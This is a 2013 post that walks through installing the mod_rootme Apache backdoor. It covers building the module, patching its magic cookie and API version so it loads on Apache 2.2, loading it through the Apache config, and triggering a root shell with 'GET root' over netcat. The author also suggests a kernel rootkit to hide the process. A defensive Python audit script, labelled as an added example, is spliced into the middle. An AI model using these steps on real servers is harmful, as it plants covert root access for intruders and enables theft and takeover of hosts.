Linux rootkit: Apache mod_rootme port reuse

2013-11-13 15:55:05


No way around it, accounts are getting banned again... so I'm just reposting this backdoor; I've been using it all along and it's pretty good... Combine it with another rootkit (sk13, an LKM rootkit) to hide the process.
This is a modular Apache backdoor that obtains a shell through a pipe and supports a tty, but its process cannot be hidden.

First, a look at the structure of this rootkit:

[email protected]:~/Tmp# ls
mod_rootme-0.4.tar.gz
[email protected]:~/Tmp# tar -zxvf mod*tar.gz
mod_rootme-0.4/
mod_rootme-0.4/mrm_client.c
mod_rootme-0.4/mod_rootme.c
mod_rootme-0.4/httpd13.h
mod_rootme-0.4/Makefile32
mod_rootme-0.4/mod_rootme22.c
mod_rootme-0.4/mod_rootme2.c
mod_rootme-0.4/client.exe
mod_rootme-0.4/mrm_server.h
mod_rootme-0.4/Makefile
mod_rootme-0.4/httpd20.h
mod_rootme-0.4/README.txt
mod_rootme-0.4/httpd22.h
[email protected]:~/Tmp# ls
mod_rootme-0.4 mod_rootme-0.4.tar.gz
[email protected]:~/Tmp# cd mod*
[email protected]:~/Tmp/mod_rootme-0.4# ls
client.exe httpd20.h Makefile mod_rootme22.c mod_rootme.c mrm_server.h
httpd13.h httpd22.h Makefile32 mod_rootme2.c mrm_client.c README.txt
[email protected]:~/Tmp/mod_rootme-0.4#

Now the README.txt file:



mod_rootme: making Apache almost as insecure as IIS 5

What's new in v0.4
------------------

* added support for Apache 2.2.x

* Added Makefile32 that compiles 32-bit, meant for use on 64-bit
systems. (Linux only, because I haven't tested it elsewhere)

What's new in v0.3
------------------

* fully functional shell with ssh-like pty support.

* ported to more unix flavors (*BSD, SunOS, OSF, etc.)

* client/server code and apache headers cleanup.

What's new in v0.2
------------------

* added full support for Apache 2.0.x

* added AP13/EAPI magic cookie support.

* master process properly exits when the
apache server is shutting down.

Installing mod_rootme
---------------------

Note: when starting apache, if you get the message
"mod_rootme.so uses plain Apache 1.3 API, this module
might crash under EAPI!", you have to edit mod_rootme.c
and replace COOKIE_AP13 with COOKIE_EAPI.

-=[ Target: Apache 1.3.x (Debian) ]=-

# make <system>
# cp mod_rootme.so /usr/lib/apache/1.3/
# vi /etc/apache/httpd.conf (or modules.conf)
[...]
LoadModule rootme_module /usr/lib/apache/1.3/mod_rootme.so

# apachectl restart

-=[ Target: Apache 1.3.x (local ) ]=-

# make <system>
# cp mod_rootme.so /usr/local/apache/libexec/
# vi /usr/local/apache/conf/httpd.conf
[...]
LoadModule rootme_module libexec/mod_rootme.so
[...]
AddModule mod_rootme.c

# /usr/local/apache/bin/apachectl restart

-=[ Target: Apache 2.0.x (Debian) ]=-

# make <system>
# cp mod_rootme2.so /usr/lib/apache2/modules/
# cat > /etc/apache2/mods-enabled/rootme2.load
LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme2.so
^D
# apache2ctl stop; apache2ctl start

-=[ Target: Apache 2.0.x (local ) ]=-

# make <system>
# cp mod_rootme2.so /usr/local/apache2/modules/
# vi /usr/local/apache2/conf/httpd.conf
[...]
LoadModule rootme2_module modules/mod_rootme2.so

# PATH=/usr/local/apache2/bin:$PATH; export PATH
# apachectl stop; apachectl start

-=[ Target: Apache 2.2.x (Debian) ]=-

# make <system>
# cp mod_rootme22.so /usr/lib/apache2/modules/
# cat > /etc/apache2/mods-enabled/rootme22.load
LoadModule rootme2_module /usr/lib/apache2/modules/mod_rootme22.so
^D
# apache2ctl stop; apache2ctl start

-=[ Target: Apache 2.2.x (local ) ]=-

# make <system>
# cp mod_rootme22.so /usr/local/apache2/modules/
# vi /usr/local/apache2/conf/httpd.conf
[...]
LoadModule rootme2_module modules/mod_rootme22.so

# PATH=/usr/local/apache2/bin:$PATH; export PATH
# apachectl stop; apachectl start

Using mod_rootme
----------------

Make sure you have netcat installed on your system
(the telnet client will not work for this purpose)

$ nc 192.168.2.20 80
GET root
rootme-0.3 ready
id
uid=0(root) gid=1(other)
uname -a
SunOS atlas 5.8 Generic_108528-07 sun4u sparc SUNW,UltraAX-i2
stty
stty: : Invalid argument
exit

You can also use the bundled client to get a somewhat
more comfortable rootshell:

./client 192.168.2.20
rootme-0.3 ready
[email protected]:~ # ps
PID TTY TIME CMD
2314 pts/2 0:00 bash
2316 pts/2 0:00 ps
[email protected]:~ # stty
speed 9600 baud; -parity
rows = 25; columns = 80; ypixels = 0; xpixels = 0;
swtch = <undef>;
brkint -inpck -istrip icrnl -ixany imaxbel onlcr tab3
echo echoe echok echoctl echoke iexten
[email protected]:~ # exit

To run the prebuilt client.exe you'll need cygwin1.dll from
http://www.cygwin.com or http://devine.nerim.net/cygwin1.dll

Do the reconnaissance before installing.

Apache configuration files on Debian-family systems:

/etc/apache2/apache2.conf
/etc/apache2/ports.conf

Check the Apache version:

[email protected]:/etc/apache2# apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built: Nov 6 2012 20:40:59



Apache module directory on Debian-family systems:

[email protected]:/usr/lib/apache2/modules# ls
httpd.exp mod_authn_dbd.so mod_authz_owner.so mod_dav_lock.so mod_ext_filter.so mod_log_forensic.so mod_proxy_http.so mod_substitute.so
libphp5.so mod_authn_dbm.so mod_authz_user.so mod_dav.so mod_file_cache.so mod_mem_cache.so mod_proxy_scgi.so mod_suexec.so
mod_actions.so mod_authn_default.so mod_autoindex.so mod_dbd.so mod_filter.so mod_mime_magic.so mod_proxy.so mod_unique_id.so
mod_alias.so mod_authn_file.so mod_cache.so mod_deflate.so mod_headers.so mod_mime.so mod_reqtimeout.so mod_userdir.so
mod_asis.so mod_authnz_ldap.so mod_cern_meta.so mod_dir.so mod_ident.so mod_negotiation.so mod_rewrite.so mod_usertrack.so
mod_auth_basic.so mod_authz_dbm.so mod_cgid.so mod_disk_cache.so mod_imagemap.so mod_proxy_ajp.so mod_setenvif.so mod_version.so
mod_auth_digest.so mod_authz_default.so mod_cgi.so mod_dumpio.so mod_include.so mod_proxy_balancer.so mod_speling.so mod_vhost_alias.so
mod_authn_alias.so mod_authz_groupfile.so mod_charset_lite.so mod_env.so mod_info.so mod_proxy_connect.so mod_ssl.so
mod_authn_anon.so mod_authz_host.so mod_dav_fs.so mod_expires.so mod_ldap.so mod_proxy_ftp.so mod_status.so

This rootkit fails to load on Apache 2.2.*.

The problem appears to be caused by the magic field.

Before actually activating a module, Apache checks whether what was loaded is a genuine Apache module. The check is done on the magic field of the module struct. That field is filled in by the STANDARD20_MODULE_STUFF macro, which sets magic to MODULE_MAGIC_COOKIE, defined as follows:

#define MODULE_MAGIC_COOKIE 0x41503232UL /* "AP22" */

Open httpd22.h and change:

#define MODULE_MAGIC_COOKIE 0x41503230UL

to:

#define MODULE_MAGIC_COOKIE 0x41503232UL

Then compile:
[email protected]:~/Tmp/mod_rootme-0.4# make linux
gcc -s -fPIC -shared mod_rootme.c -o mod_rootme.so -lutil -DLINUX
gcc -s -fPIC -shared mod_rootme2.c -o mod_rootme2.so -lutil -DLINUX
gcc -s -fPIC -shared mod_rootme22.c -o mod_rootme22.so -lutil -DLINUX
gcc -s mrm_client.c -o client
[email protected]:~/Tmp/mod_rootme-0.4#

Copy the file into the apache2 module directory:

[email protected]:~/Tmp/mod_rootme-0.4# cp mod_rootme22.so /usr/lib/apache2/modules
[email protected]:~/Tmp/mod_rootme-0.4# ls /usr/lib/apache2/modules |grep mod_rootme22.so
mod_rootme22.so
[email protected]:~/Tmp/mod_rootme-0.4#

Edit the Apache configuration file:

[email protected]:/etc/apache2# ls
apache2.conf conf.d envvars httpd.conf magic mods-available mods-enabled ports.conf sites-available sites-enabled
[email protected]:/etc/apache2# cp apache2.conf apache2.conf.bak
[email protected]:/etc/apache2# ls
apache2.conf apache2.conf.bak conf.d envvars httpd.conf magic mods-available mods-enabled ports.conf sites-available sites-enabled
[email protected]:/etc/apache2# gedit apache2.conf

Append at the end of the file:

LoadModule rootme22_module /usr/lib/apache2/modules/mod_rootme22.so

Save, then restart the httpd service:

[email protected]:/etc/apache2# /etc/init.d/apache2 restart
* Restarting web server apache2 apache2: Syntax error on line 238 of /etc/apache2/apache2.conf: Module "mod_rootme22.c" is not compatible with this version of Apache (found 20020903, need 20051115). Please contact the vendor for the correct version.

Reopen httpd22.h and change:

#define MODULE_MAGIC_NUMBER_MAJOR 20020903

to:

#define MODULE_MAGIC_NUMBER_MAJOR 20051115

Recompile and install again.



As the screenshot shows, installation succeeded.
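Two defender-side checks that follow directly from what the post shows: the backdoor is activated by a LoadModule line pointing at a .so the distro never shipped (the line appended to apache2.conf above), and it is triggered by "GET root", which is not a valid HTTP request line (the README's netcat session). The script below is an added example, not code from the post or from the mod_rootme project; the config text, the known-good set and the request lines are constructed samples, and the known-good set is assumed to come from something like the list of .so files owned by the distro's apache2 packages.

```python
"""Audit helpers for an Apache host suspected of carrying mod_rootme.

Added example, not part of the original post. All sample input is
constructed. Check 1 lists LoadModule targets outside a known-good set;
check 2 flags request lines that are not RFC-shaped HTTP, which is the
shape of the "GET root" trigger shown in the README.
"""
import re

LOADMODULE_RE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.M)
# method SP request-target SP HTTP-version, with an origin-form or "*" target
REQUEST_LINE_RE = re.compile(
    r"^(GET|HEAD|POST|PUT|DELETE|OPTIONS|TRACE|CONNECT|PATCH) (/\S*|\*) HTTP/\d\.\d$")


def loaded_modules(conf_text):
    """Return (module_symbol, path) for every LoadModule directive."""
    return LOADMODULE_RE.findall(conf_text)


def unexpected_modules(conf_text, known_good):
    """LoadModule entries whose file basename is not in known_good
    (assumed: a set built from the distro's own apache2 module files)."""
    return [(sym, path) for sym, path in loaded_modules(conf_text)
            if path.rsplit("/", 1)[-1] not in known_good]


def is_malformed_request_line(line):
    """True when the line is not a syntactically valid HTTP request line."""
    return REQUEST_LINE_RE.match(line.strip()) is None


# constructed sample config, mirroring the line the post appends
SAMPLE_CONF = """\
LoadModule alias_module /usr/lib/apache2/modules/mod_alias.so
LoadModule rewrite_module /usr/lib/apache2/modules/mod_rewrite.so
LoadModule rootme22_module /usr/lib/apache2/modules/mod_rootme22.so
"""
KNOWN_GOOD = {"mod_alias.so", "mod_rewrite.so"}

# constructed request lines as a sensor or proxy might record them
SAMPLE_REQUEST_LINES = [
    "GET / HTTP/1.1",
    "GET root",              # trigger shape from the README session
    "POST /login HTTP/1.0",
]

if __name__ == "__main__":
    for sym, path in unexpected_modules(SAMPLE_CONF, KNOWN_GOOD):
        print(f"unexpected module: {sym} -> {path}")
    for line in SAMPLE_REQUEST_LINES:
        if is_malformed_request_line(line):
            print(f"malformed request line: {line!r}")
```

On a real host, pair the module check with a file-ownership query for each flagged path and a look at the file's mtime against the last package upgrade.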

Starting up a second server:







For details see:
http://fuzzexp.org/about-mod_rootme-point-out-the-things.html
http://www.nowamagic.net/librarys/veda/detail/1293

Reference documents:

http://people.apache.org/~rpluem/patches/forcerecovery_2.2.diff

http://svn.apache.org/repos/asf/httpd/httpd/branches/2.2.x/include/ap_mmn.h

http://forums.devshed.com/apache-development-15/api-structure-php5-module-in-file-usr-local-apache2-modules-326634.html

http://www.nowamagic.net/librarys/veda/detail/1293

http://blog.sina.com.cn/s/blog_5546a5ad01010fyn.html

http://linux.chinaunix.net/techdoc/net/2007/10/07/969337.shtml
